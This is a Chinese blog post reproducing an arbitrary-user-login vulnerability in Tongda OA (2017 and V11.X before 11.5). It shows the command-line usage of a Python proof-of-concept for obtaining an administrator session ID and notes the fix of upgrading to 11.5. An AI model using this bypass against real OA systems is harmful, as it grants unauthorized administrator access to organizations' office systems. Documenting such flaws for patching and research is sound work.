通达OA 前台任意用户登录漏洞复现

本文详细介绍了通达OA系统的一个高危漏洞,允许攻击者绕过登录验证,伪装成管理员。影响版本包括通达OA2017及V11.X(低于V11.5)。提供了复现环境搭建方法和Python POC代码。修复措施是升级到11.5版本。文章还包含了漏洞复现步骤和数据包操作说明。
摘要由CSDN通过智能技术生成

v2-33d93b907c3f53d50ef78d5d78ec9441_b.jpg


一、漏洞描述

通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。

二、影响版本

通达OA2017、V11.X<V11.5

环境搭建​:自行镜像环境搭建(后台回复“tongda”获取环境和POC)

本实验复现环境使用2017版本​。

三、漏洞复现

详细POC参数

➜ thelostworld git:(master) python3 tongda-oA.py -husage: POC.py [-h] [-v {11,2017}] [-url TARGETURL]​​optional arguments:-h, --help showthishelp messageandexit-v {11,2017}, --tdoaversion {11,2017}Target TongDa OA Version. e.g: -v11、-v2017 -url TARGETURL, --targeturl TARGETURLTarget URL. e.g: -url192.168.2.1、-url 192.168.2.1

获取SESSIONID

V11.X 版本

python3 POC.py -v 11 -url XXX.com


v2-36d20b9c83be69fce981abe038e34cfe_b.png


2017版本

python3POC.py-v2017-urlXXX.com


v2-35eedd71559022571ba48975bb8b1adf_b.png


抓取数据包替换SESSIONID


v2-7b632a7f3a1ae864250c5b31911d8e4d_b.jpg


四、漏洞修复

及时更新11.5版本

tongda2000.com/download

参考:

vas.riskivy.com/vuln-de

mp.weixin.qq.com/s/aZMR

后台回复“tongda”获取环境和POC

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-8ca564e9be97c3baa1f87c4e7bc9e156_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

​原文连接:

mp.weixin.qq.com/s?

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值